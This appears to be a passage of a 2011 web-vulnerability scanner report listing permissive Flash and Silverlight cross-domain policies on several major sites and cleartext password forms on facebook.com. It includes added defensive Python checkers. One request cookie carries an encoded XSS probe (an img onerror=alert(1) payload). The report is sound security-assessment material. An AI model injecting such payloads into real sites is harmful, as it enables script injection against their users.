   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.15. http://www.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

3.16. https://www.godaddy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

3.17. http://www.ibm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

3.18. http://www.marketwatch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

3.19. http://www.mmafighting.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

3.20. http://www.moviefone.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.21. http://www.netvibes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netvibes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

3.22. http://www.pageflakes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

3.23. http://www.popeater.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.24. http://www.realtytrac.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realtytrac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.realtytrac.com" />
   <allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

3.25. http://www.tuaw.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.26. http://www.truveo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>


4. Silverlight cross-domain policy

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
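The Flash and Silverlight policy descriptions in sections 3 and 4 both boil down to one question: how broad is the set of origins that may make credentialed, two-way requests against the host publishing the policy? The following script is an added example (not part of this report and not Burp's own logic) that parses both policy formats and scores them with the same severity ladder the report uses: any origin is High, a wildcard suffix is Low, and explicitly named hosts are Information. The sample policies are modelled on the responses quoted above, except for the insecure Flash policy and the Silverlight policy, which are constructed; all hostnames in them are illustrative.

```python
"""Classify Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies by how broadly they grant two-way access."""
import xml.etree.ElementTree as ET

# Sample policies. The first two mirror responses quoted in this report;
# the last two are constructed for illustration.
FLASH_WILDCARD = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.realtytrac.com" />
   <allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>"""

FLASH_SPECIFIC = """<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>"""

# Constructed: trusts every origin AND lets plain-http origins talk to an
# https policy host (secure="false"), which undoes TLS for the whole policy.
FLASH_ANY_INSECURE = """<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>"""

# Constructed Silverlight policy granting every origin access to every path.
SILVERLIGHT_ANY = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def allowed_origins(policy_xml):
    """Return [(origin_pattern, transport_is_secure), ...] for either format.

    Flash lists hosts in <allow-access-from domain=...>; Silverlight lists
    them in <domain uri=...> under <allow-from>. Both are normalised to one
    shape so a single classifier can score them. ElementTree does not fetch
    the external DTD named in a DOCTYPE, so the parse stays offline.
    """
    data = policy_xml.encode("utf-8") if isinstance(policy_xml, str) else policy_xml
    root = ET.fromstring(data)
    if root.tag == "cross-domain-policy":                      # Flash
        return [(e.get("domain", ""), e.get("secure", "true").lower() != "false")
                for e in root.iter("allow-access-from")]
    if root.tag == "access-policy":                            # Silverlight
        return [(d.get("uri", ""), True) for d in root.iter("domain")]
    raise ValueError(f"unrecognised policy root <{root.tag}>")


def classify(pattern):
    """'any' for *, 'wildcard' for *.suffix, otherwise 'specific'."""
    host = pattern.split("://", 1)[-1]       # Silverlight patterns may carry a scheme
    if host == "*":
        return "any"
    if host.startswith("*."):
        return "wildcard"
    return "specific"


def assess(policy_xml):
    """Score a policy the way this report does: High / Low / Information."""
    origins = allowed_origins(policy_xml)
    kinds = [classify(p) for p, _ in origins]
    if not origins:
        severity = "None"                    # nothing is trusted cross-domain
    elif "any" in kinds:
        severity = "High"
    elif "wildcard" in kinds:
        severity = "Low"
    else:
        severity = "Information"
    return {
        "origins": [p for p, _ in origins],
        "severity": severity,
        # Flash only: entries with secure="false" accept http:// origins even
        # when the policy itself was served over https.
        "insecure_transport": [p for p, secure in origins if not secure],
    }


if __name__ == "__main__":
    for label, xml in [("realtytrac-style", FLASH_WILDCARD), ("truveo-style", FLASH_SPECIFIC),
                       ("flash any", FLASH_ANY_INSECURE), ("silverlight any", SILVERLIGHT_ANY)]:
        print(f"{label:16} -> {assess(xml)}")
```

When running this against a live host, fetch both `/crossdomain.xml` and `/clientaccesspolicy.xml` over the same scheme the application uses, because a policy served only over HTTP, or one with `secure="false"`, extends the trust to whoever can tamper with plain-text traffic, not just to the listed domains.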

5. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
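The finding above depends on where a form actually submits to, which is not always spelled out in the markup: a missing `action`, an empty one, or a fragment such as `#comments` all post back to the page's own URL, so the page's scheme decides whether the password crosses the wire in the clear. The script below is an added example (not part of this report and not Burp's own check) that resolves each form's target against the page URL and reports password forms that submit over plain HTTP, plus the weaker "mixed" case where an HTTP page posts to HTTPS. The sample markup is constructed, modelled on the comment form quoted in the instances that follow; the `accounts.example.test` host is illustrative.

```python
"""Find <form>s containing a password field and decide whether the submission
travels over clear-text HTTP, resolving the action the way a browser would."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page, modelled on the comment form quoted in this report.
PAGE_URL = "http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/"
PAGE_HTML = """
<form action="#comments" id="commentform" name="commentform" method="post">
  <input type="text" name="AuthorName" />
  <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/>
</form>
<form action="https://accounts.example.test/login" method="post">
  <input type="password" name="pw" />
</form>
<form action="/search" method="get"><input type="text" name="q"/></form>
"""


class _FormScanner(HTMLParser):
    """Collect every <form> together with the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                      # attribute without a value -> None
        if tag == "form":
            self._current = {"action": a.get("action"),
                             "method": (a.get("method") or "get").lower(),
                             "password_fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password_fields"].append(a.get("name") or a.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def password_form_findings(page_url, html):
    """Return one finding per password form whose submission is not end-to-end TLS.

    kind == "cleartext": the target URL is http://, the password itself is exposed.
    kind == "mixed": the target is https:// but the page came over http://, so an
    on-path attacker can rewrite the form before the user ever types.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    page_scheme = urlsplit(page_url).scheme
    findings = []
    for f in scanner.forms:
        if not f["password_fields"]:
            continue
        # None, "" and "#fragment" all resolve to the page itself via urljoin.
        target = urljoin(page_url, f["action"] or "")
        target_scheme = urlsplit(target).scheme
        if target_scheme == "http":
            kind = "cleartext"
        elif page_scheme == "http":
            kind = "mixed"
        else:
            continue                         # https page posting to https: fine
        findings.append({"kind": kind, "method": f["method"],
                         "action": target, "fields": f["password_fields"]})
    return findings


if __name__ == "__main__":
    for finding in password_form_findings(PAGE_URL, PAGE_HTML):
        print(finding)
```

The same scan run with the page URL switched to `https://` produces no findings, which is the remediation in practice: serve the page that carries the form over TLS, not just the endpoint it posts to.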


5.1. http://www.facebook.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a registration form (id="reg", method="post") which is submitted over clear-text HTTP; no action attribute appears in the extract below, so the form posts back to the page's own HTTP URL. The form contains the password field reg_passwd__.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.2. http://www.facebook.com/r.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a registration form (id="reg", method="post") which is submitted over clear-text HTTP; no action attribute appears in the extract below, so the form posts back to the page's own HTTP URL. The form contains the password field reg_passwd__.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
